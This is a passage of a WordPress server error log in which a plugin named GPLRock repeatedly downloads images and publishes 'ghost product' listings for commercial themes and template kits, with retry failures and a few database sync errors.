https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-dec065cf.jpg [05-Apr-2026 10:25:19 UTC] GPLRock: Ghost product published with image - Product ID: woocommerce-subscriptions [05-Apr-2026 10:25:21 UTC] GPLRock: Image downloaded successfully for product superio-job-board-wordpress-theme (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-47fbc381.avif [05-Apr-2026 10:25:21 UTC] GPLRock: Using pre-downloaded image for product superio-job-board-wordpress-theme: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-47fbc381.avif [05-Apr-2026 10:25:21 UTC] GPLRock: Ghost product published with image - Product ID: superio-job-board-wordpress-theme [05-Apr-2026 10:25:22 UTC] GPLRock: Image downloaded successfully for product civi-job-board-wordpress-theme (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-d9ac5945.jpg [05-Apr-2026 10:25:22 UTC] GPLRock: Using pre-downloaded image for product civi-job-board-wordpress-theme: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-d9ac5945.jpg [05-Apr-2026 10:25:22 UTC] GPLRock: Ghost product published with image - Product ID: civi-job-board-wordpress-theme [05-Apr-2026 10:25:23 UTC] GPLRock: Image downloaded successfully for product betheme-responsive-multi-purpose-wordpress-theme (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-c2bad084.avif [05-Apr-2026 10:25:23 UTC] GPLRock: Using pre-downloaded image for product betheme-responsive-multi-purpose-wordpress-theme: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-c2bad084.avif [05-Apr-2026 10:25:23 UTC] GPLRock: Ghost product published with image - Product ID: betheme-responsive-multi-purpose-wordpress-theme [05-Apr-2026 10:25:25 UTC] GPLRock: Image downloaded successfully for product martfury-woocommerce-marketplace-wordpress-theme (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-cf30fba5.avif [05-Apr-2026 10:25:25 UTC] GPLRock: Using pre-downloaded image for product martfury-woocommerce-marketplace-wordpress-theme: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-cf30fba5.avif [05-Apr-2026 10:25:25 UTC] GPLRock: Ghost product published with image - Product ID: martfury-woocommerce-marketplace-wordpress-theme [05-Apr-2026 10:25:28 UTC] GPLRock: Image download failed for product elessi-woocommerce-ajax-wordpress-theme-rtl-support (attempt 1/3). HTTP Code: 404, Error: . Retrying... [05-Apr-2026 10:25:32 UTC] GPLRock: Image download failed for product elessi-woocommerce-ajax-wordpress-theme-rtl-support (attempt 2/3). HTTP Code: 404, Error: . Retrying... [05-Apr-2026 10:25:36 UTC] GPLRock Error: Failed to download image from https://www.gplrock.com/wp-content/uploads/2020/07/Elessi-WooCommerce-AJAX-WordPress-Theme-RTL-support.jpg for product elessi-woocommerce-ajax-wordpress-theme-rtl-support after 3 attempts. HTTP Code: 404, Error: [05-Apr-2026 10:25:38 UTC] GPLRock: Image download failed for product elessi-woocommerce-ajax-wordpress-theme-rtl-support (attempt 1/3). HTTP Code: 404, Error: . Retrying... [05-Apr-2026 10:25:42 UTC] GPLRock: Image download failed for product elessi-woocommerce-ajax-wordpress-theme-rtl-support (attempt 2/3). HTTP Code: 404, Error: . Retrying... [05-Apr-2026 10:25:46 UTC] GPLRock Error: Failed to download image from https://www.gplrock.com/wp-content/uploads/2020/07/Elessi-WooCommerce-AJAX-WordPress-Theme-RTL-support.jpg for product elessi-woocommerce-ajax-wordpress-theme-rtl-support after 3 attempts. HTTP Code: 404, Error: [05-Apr-2026 10:25:46 UTC] GPLRock WARNING: Image download failed for product elessi-woocommerce-ajax-wordpress-theme-rtl-support. URL: https://www.gplrock.com/wp-content/uploads/2020/07/Elessi-WooCommerce-AJAX-WordPress-Theme-RTL-support.jpg [05-Apr-2026 10:25:46 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: elessi-woocommerce-ajax-wordpress-theme-rtl-support [05-Apr-2026 10:26:44 UTC] GPLRock: Image downloaded successfully for product expanet-broadband-internet-services-elementor-template-kit (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-7fae0c0d.webp [05-Apr-2026 10:26:44 UTC] GPLRock: Using pre-downloaded image for product expanet-broadband-internet-services-elementor-template-kit: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-7fae0c0d.webp [05-Apr-2026 10:26:44 UTC] GPLRock: Ghost product published with image - Product ID: expanet-broadband-internet-services-elementor-template-kit [05-Apr-2026 10:26:46 UTC] GPLRock: Image downloaded successfully for product exodio-recording-sound-studio-elementor-template-kit (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-27ba5bbb.webp [05-Apr-2026 10:26:46 UTC] GPLRock: Using pre-downloaded image for product exodio-recording-sound-studio-elementor-template-kit: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-27ba5bbb.webp [05-Apr-2026 10:26:46 UTC] GPLRock: Ghost product published with image - Product ID: exodio-recording-sound-studio-elementor-template-kit [05-Apr-2026 10:26:47 UTC] GPLRock: Image downloaded successfully for product exobank-financial-elementor-template-kit (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-986ea524.webp [05-Apr-2026 10:26:47 UTC] GPLRock: Using pre-downloaded image for product exobank-financial-elementor-template-kit: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-986ea524.webp [05-Apr-2026 10:26:47 UTC] GPLRock: Ghost product published with image - Product ID: exobank-financial-elementor-template-kit [05-Apr-2026 10:26:49 UTC] GPLRock: Image downloaded successfully for product execoore-tech-fintech-crypto-elementor-template-kit (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-0b8c08cf.webp [05-Apr-2026 10:26:49 UTC] GPLRock: Using pre-downloaded image for product execoore-tech-fintech-crypto-elementor-template-kit: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-0b8c08cf.webp [05-Apr-2026 10:26:49 UTC] GPLRock: Ghost product published with image - Product ID: execoore-tech-fintech-crypto-elementor-template-kit [05-Apr-2026 10:26:50 UTC] GPLRock: Image downloaded successfully for product estame-real-estate-elementor-template-kit (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-d6850ff6.webp [05-Apr-2026 10:26:50 UTC] GPLRock: Using pre-downloaded image for product estame-real-estate-elementor-template-kit: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-d6850ff6.webp [05-Apr-2026 10:26:50 UTC] GPLRock: Ghost product published with image - Product ID: estame-real-estate-elementor-template-kit [05-Apr-2026 10:26:52 UTC] GPLRock: Image downloaded successfully for product essence-life-coach-speaker-elementor-template-kit (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-b41ab0ae.jpg [05-Apr-2026 10:26:52 UTC] GPLRock: Using pre-downloaded image for product essence-life-coach-speaker-elementor-template-kit: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-b41ab0ae.jpg [05-Apr-2026 10:26:52 UTC] GPLRock: Ghost product published with image - Product ID: essence-life-coach-speaker-elementor-template-kit [05-Apr-2026 10:26:53 UTC] GPLRock: Image downloaded successfully for product essein-beauty-spa-elementor-template-kit (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-922473b0.webp [05-Apr-2026 10:26:53 UTC] GPLRock: Using pre-downloaded image for product essein-beauty-spa-elementor-template-kit: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-922473b0.webp [05-Apr-2026 10:26:53 UTC] GPLRock: Ghost product published with image - Product ID: essein-beauty-spa-elementor-template-kit [05-Apr-2026 10:26:55 UTC] GPLRock: Image downloaded successfully for product esse-life-coach-consulting-elementor-template-kit (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-48c75d4d.webp [05-Apr-2026 10:26:55 UTC] GPLRock: Using pre-downloaded image for product esse-life-coach-consulting-elementor-template-kit: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-48c75d4d.webp [05-Apr-2026 10:26:55 UTC] GPLRock: Ghost product published with image - Product ID: esse-life-coach-consulting-elementor-template-kit [05-Apr-2026 10:26:56 UTC] GPLRock: Image downloaded successfully for product esreb-car-motorcycle-wash-elementor-template-kit (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-e47e20dd.webp [05-Apr-2026 10:26:56 UTC] GPLRock: Using pre-downloaded image for product esreb-car-motorcycle-wash-elementor-template-kit: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-e47e20dd.webp [05-Apr-2026 10:26:56 UTC] GPLRock: Ghost product published with image - Product ID: esreb-car-motorcycle-wash-elementor-template-kit [05-Apr-2026 10:26:58 UTC] GPLRock: Image downloaded successfully for product eshikkha-elearning-elementor-template-kit (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-14959957.webp [05-Apr-2026 10:26:58 UTC] GPLRock: Using pre-downloaded image for product eshikkha-elearning-elementor-template-kit: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-14959957.webp [05-Apr-2026 10:26:58 UTC] GPLRock: Ghost product published with image - Product ID: eshikkha-elearning-elementor-template-kit [05-Apr-2026 10:26:59 UTC] WordPress database error Commands out of sync; you can't run this command now for query SELECT option_name, option_value FROM wpwf_options WHERE option_name IN ('_transient_timeout_doing_cron') made by shutdown_action_hook, do_action('shutdown'), WP_Hook->do_action, WP_Hook->apply_filters, _wp_cron, spawn_cron, set_transient, wp_prime_option_caches [05-Apr-2026 10:26:59 UTC] WordPress database error Commands out of sync; you can't run this command now for query SELECT autoload FROM wpwf_options WHERE option_name = '_transient_doing_cron' LIMIT 1 made by shutdown_action_hook, do_action('shutdown'), WP_Hook->do_action, WP_Hook->apply_filters, _wp_cron, spawn_cron, set_transient, update_option [05-Apr-2026 10:26:59 UTC] WordPress database error Commands out of sync; you can't run this command now for query UPDATE `wpwf_options` SET `option_value` = '1775384819.9433879852294921875000' WHERE `option_name` = '_transient_doing_cron' made by shutdown_action_hook, do_action('shutdown'), WP_Hook->do_action, WP_Hook->apply_filters, _wp_cron, spawn_cron, set_transient, update_option [05-Apr-2026 10:29:43 UTC] GPLRock: Image download failed for product saspik-landing-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 10:29:45 UTC] GPLRock: Image download failed for product saspik-landing-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 10:29:47 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/saspik--landing-wordpress-theme-15483.webp for product saspik-landing-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 10:29:47 UTC] GPLRock: Image download failed for product saspik-landing-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 10:29:49 UTC] GPLRock: Image download failed for product saspik-landing-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 10:29:51 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/saspik--landing-wordpress-theme-15483.webp for product saspik-landing-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 10:29:51 UTC] GPLRock WARNING: Image download failed for product saspik-landing-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/saspik--landing-wordpress-theme-15483.webp [05-Apr-2026 10:29:51 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: saspik-landing-wordpress-theme [05-Apr-2026 10:29:51 UTC] GPLRock: Image download failed for product aoriv-ai-robotics-iot-startup-elementor-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 10:29:54 UTC] GPLRock: Image download failed for product aoriv-ai-robotics-iot-startup-elementor-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 10:29:56 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/aoriv---ai-robotics--iot-startup-elementor-wordpress-theme-15106.webp for product aoriv-ai-robotics-iot-startup-elementor-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 10:29:56 UTC] GPLRock: Image download failed for product aoriv-ai-robotics-iot-startup-elementor-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 10:29:58 UTC] GPLRock: Image download failed for product aoriv-ai-robotics-iot-startup-elementor-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 10:30:00 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/aoriv---ai-robotics--iot-startup-elementor-wordpress-theme-15106.webp for product aoriv-ai-robotics-iot-startup-elementor-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 10:30:00 UTC] GPLRock WARNING: Image download failed for product aoriv-ai-robotics-iot-startup-elementor-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/aoriv---ai-robotics--iot-startup-elementor-wordpress-theme-15106.webp [05-Apr-2026 10:30:00 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: aoriv-ai-robotics-iot-startup-elementor-wordpress-theme [05-Apr-2026 10:30:00 UTC] GPLRock: Image download failed for product citytours-travel-and-hotels-site-template (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 10:30:02 UTC] GPLRock: Image download failed for product citytours-travel-and-hotels-site-template (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 10:30:04 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/citytours---travel-and-hotels-site-template-29594.webp for product citytours-travel-and-hotels-site-template after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 10:30:04 UTC] GPLRock: Image download failed for product citytours-travel-and-hotels-site-template (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 10:30:07 UTC] GPLRock: Image download failed for product citytours-travel-and-hotels-site-template (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 10:30:09 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/citytours---travel-and-hotels-site-template-29594.webp for product citytours-travel-and-hotels-site-template after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 10:30:09 UTC] GPLRock WARNING: Image download failed for product citytours-travel-and-hotels-site-template. URL: https://meldwp.com/wp-content/uploads/citytours---travel-and-hotels-site-template-29594.webp [05-Apr-2026 10:30:09 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: citytours-travel-and-hotels-site-template [05-Apr-2026 10:30:09 UTC] GPLRock: Image download failed for product rex-minimal-wordpress-portfolio-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 10:30:11 UTC] GPLRock: Image download failed for product rex-minimal-wordpress-portfolio-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 10:30:13 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/rex---minimal-wordpress-portfolio-theme-13519.webp for product rex-minimal-wordpress-portfolio-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 10:30:13 UTC] GPLRock: Image download failed for product rex-minimal-wordpress-portfolio-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 10:30:15 UTC] GPLRock: Image download failed for product rex-minimal-wordpress-portfolio-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 10:30:17 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/rex---minimal-wordpress-portfolio-theme-13519.webp for product rex-minimal-wordpress-portfolio-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 10:30:17 UTC] GPLRock WARNING: Image download failed for product rex-minimal-wordpress-portfolio-theme. URL: https://meldwp.com/wp-content/uploads/rex---minimal-wordpress-portfolio-theme-13519.webp [05-Apr-2026 10:30:17 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: rex-minimal-wordpress-portfolio-theme [05-Apr-2026 10:30:18 UTC] GPLRock: Image download failed for product buildark-construction-business-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 10:30:20 UTC] GPLRock: Image download failed for product buildark-construction-business-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 10:30:22 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/buildark--construction-business-wordpress-theme-2734.webp for product buildark-construction-business-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 10:30:22 UTC] GPLRock: Image download failed for product buildark-construction-business-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 10:30:24 UTC] GPLRock: Image download failed for product buildark-construction-business-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 10:30:26 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/buildark--construction-business-wordpress-theme-2734.webp for product buildark-construction-business-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 10:30:26 UTC] GPLRock WARNING: Image download failed for product buildark-construction-business-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/buildark--construction-business-wordpress-theme-2734.webp [05-Apr-2026 10:30:26 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: buildark-construction-business-wordpress-theme [05-Apr-2026 10:30:26 UTC] GPLRock: Image download failed for product mixone-wordpress-music-magazine-with-ajax-and-continuous-playback (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 10:30:28 UTC] GPLRock: Image download failed for product mixone-wordpress-music-magazine-with-ajax-and-continuous-playback (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 10:30:30 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/mixone---wordpress-music-magazine-with-ajax-and-continuous-playback-14318.webp for product mixone-wordpress-music-magazine-with-ajax-and-continuous-playback after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 10:30:31 UTC] GPLRock: Image download failed for product mixone-wordpress-music-magazine-with-ajax-and-continuous-playback (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 10:30:33 UTC] GPLRock: Image download failed for product mixone-wordpress-music-magazine-with-ajax-and-continuous-playback (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 10:30:35 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/mixone---wordpress-music-magazine-with-ajax-and-continuous-playback-14318.webp for product mixone-wordpress-music-magazine-with-ajax-and-continuous-playback after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 10:30:35 UTC] GPLRock WARNING: Image download failed for product mixone-wordpress-music-magazine-with-ajax-and-continuous-playback. URL: https://meldwp.com/wp-content/uploads/mixone---wordpress-music-magazine-with-ajax-and-continuous-playback-14318.webp [05-Apr-2026 10:30:35 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: mixone-wordpress-music-magazine-with-ajax-and-continuous-playback [05-Apr-2026 10:30:35 UTC] GPLRock: Image download failed for product ivent-multipurpose-event-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 10:30:37 UTC] GPLRock: Image download failed for product ivent-multipurpose-event-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 10:30:39 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/ivent---multipurpose-event-wordpress-theme-14868.webp for product ivent-multipurpose-event-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 10:30:39 UTC] GPLRock: Image download failed for product ivent-multipurpose-event-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 10:30:41 UTC] GPLRock: Image download failed for product ivent-multipurpose-event-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 10:30:44 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/ivent---multipurpose-event-wordpress-theme-14868.webp for product ivent-multipurpose-event-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 10:30:44 UTC] GPLRock WARNING: Image download failed for product ivent-multipurpose-event-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/ivent---multipurpose-event-wordpress-theme-14868.webp [05-Apr-2026 10:30:44 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: ivent-multipurpose-event-wordpress-theme [05-Apr-2026 10:30:44 UTC] GPLRock: Image downloaded successfully for product fabia-multipurpose-responsive-woocommerce-wordpress-theme (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-9ac37c41.webp [05-Apr-2026 10:30:44 UTC] GPLRock: Using pre-downloaded image for product fabia-multipurpose-responsive-woocommerce-wordpress-theme: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-9ac37c41.webp [05-Apr-2026 10:30:44 UTC] GPLRock: Ghost product published with image - Product ID: fabia-multipurpose-responsive-woocommerce-wordpress-theme [05-Apr-2026 10:30:44 UTC] GPLRock: Image download failed for product anita-photography-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 10:30:46 UTC] GPLRock: Image download failed for product anita-photography-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 10:30:48 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/anita--photography-wordpress-theme-2036.webp for product anita-photography-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 10:30:48 UTC] GPLRock: Image download failed for product anita-photography-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 10:30:50 UTC] GPLRock: Image download failed for product anita-photography-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 10:30:52 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/anita--photography-wordpress-theme-2036.webp for product anita-photography-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 10:30:52 UTC] GPLRock WARNING: Image download failed for product anita-photography-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/anita--photography-wordpress-theme-2036.webp [05-Apr-2026 10:30:52 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: anita-photography-wordpress-theme [05-Apr-2026 10:30:53 UTC] GPLRock: Image download failed for product thatha-elderly-home-senior-nursing-care-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 10:30:55 UTC] GPLRock: Image download failed for product thatha-elderly-home-senior-nursing-care-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 10:30:57 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/thatha---elderly-home--senior-nursing-care-wordpress-theme-29740.webp for product thatha-elderly-home-senior-nursing-care-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 10:30:57 UTC] GPLRock: Image download failed for product thatha-elderly-home-senior-nursing-care-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 10:30:59 UTC] GPLRock: Image download failed for product thatha-elderly-home-senior-nursing-care-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 10:31:01 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/thatha---elderly-home--senior-nursing-care-wordpress-theme-29740.webp for product thatha-elderly-home-senior-nursing-care-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 10:31:01 UTC] GPLRock WARNING: Image download failed for product thatha-elderly-home-senior-nursing-care-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/thatha---elderly-home--senior-nursing-care-wordpress-theme-29740.webp [05-Apr-2026 10:31:01 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: thatha-elderly-home-senior-nursing-care-wordpress-theme [05-Apr-2026 10:31:36 UTC] GPLRock: Image downloaded successfully for product krakatau-mountain-hiking-elementor-template-kit (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-e7550711.webp [05-Apr-2026 10:31:36 UTC] GPLRock: Using pre-downloaded image for product krakatau-mountain-hiking-elementor-template-kit: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-e7550711.webp [05-Apr-2026 10:31:36 UTC] GPLRock: Ghost product published with image - Product ID: krakatau-mountain-hiking-elementor-template-kit [05-Apr-2026 10:31:37 UTC] GPLRock: Image downloaded successfully for product krafty-construction-industry-elementor-template-kit (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-e5c42305.jpg [05-Apr-2026 10:31:37 UTC] GPLRock: Using pre-downloaded image for product krafty-construction-industry-elementor-template-kit: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-e5c42305.jpg [05-Apr-2026 10:31:37 UTC] GPLRock: Ghost product published with image - Product ID: krafty-construction-industry-elementor-template-kit [05-Apr-2026 10:31:39 UTC] GPLRock: Image downloaded successfully for product koppy-coffee-shop-cafe-elementor-template-kit (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-6ff48f25.webp [05-Apr-2026 10:31:39 UTC] GPLRock: Using pre-downloaded image for product koppy-coffee-shop-cafe-elementor-template-kit: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-6ff48f25.webp [05-Apr-2026 10:31:39 UTC] GPLRock: Ghost product published with image - Product ID: koppy-coffee-shop-cafe-elementor-template-kit [05-Apr-2026 10:31:41 UTC] GPLRock: Image downloaded successfully for product kooki-kindergarten-elementor-template-kit (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-caddcb44.jpg [05-Apr-2026 10:31:41 UTC] GPLRock: Using pre-downloaded image for product kooki-kindergarten-elementor-template-kit: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-caddcb44.jpg [05-Apr-2026 10:31:41 UTC] GPLRock: Ghost product published with image - Product ID: kooki-kindergarten-elementor-template-kit [05-Apr-2026 10:31:42 UTC] GPLRock: Image downloaded successfully for product konsultan-kit-consulting-business-elementor-template-kit (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-794cb0df.webp [05-Apr-2026 10:31:42 UTC] GPLRock: Using pre-downloaded image for product konsultan-kit-consulting-business-elementor-template-kit: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-794cb0df.webp [05-Apr-2026 10:31:42 UTC] GPLRock: Ghost product published with image - Product ID: konsultan-kit-consulting-business-elementor-template-kit [05-Apr-2026 10:31:43 UTC] GPLRock: Image downloaded successfully for product koneksi-home-wifi-internet-services-elementor-template-kit (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-0efa4084.webp [05-Apr-2026 10:31:43 UTC] GPLRock: Using pre-downloaded image for product koneksi-home-wifi-internet-services-elementor-template-kit: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-0efa4084.webp [05-Apr-2026 10:31:43 UTC] GPLRock: Ghost product published with image - Product ID: koneksi-home-wifi-internet-services-elementor-template-kit [05-Apr-2026 10:31:45 UTC] GPLRock: Image downloaded successfully for product koncrete-construction-building-elementor-template-kit (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-0492c403.webp [05-Apr-2026 10:31:45 UTC] GPLRock: Using pre-downloaded image for product koncrete-construction-building-elementor-template-kit: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-0492c403.webp [05-Apr-2026 10:31:45 UTC] GPLRock: Ghost product published with image - Product ID: koncrete-construction-building-elementor-template-kit [05-Apr-2026 10:31:46 UTC] GPLRock: Image downloaded successfully for product kologi-charity-nonprofit-elementor-template-kit (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-33826c5f.webp [05-Apr-2026 10:31:46 UTC] GPLRock: Using pre-downloaded image for product kologi-charity-nonprofit-elementor-template-kit: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-33826c5f.webp [05-Apr-2026 10:31:46 UTC] GPLRock: Ghost product published with image - Product ID: kologi-charity-nonprofit-elementor-template-kit [05-Apr-2026 10:31:48 UTC] GPLRock: Image downloaded successfully for product kodelaw-lawyer-attorney-elementor-template-kit (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-815f7422.webp [05-Apr-2026 10:31:48 UTC] GPLRock: Using pre-downloaded image for product 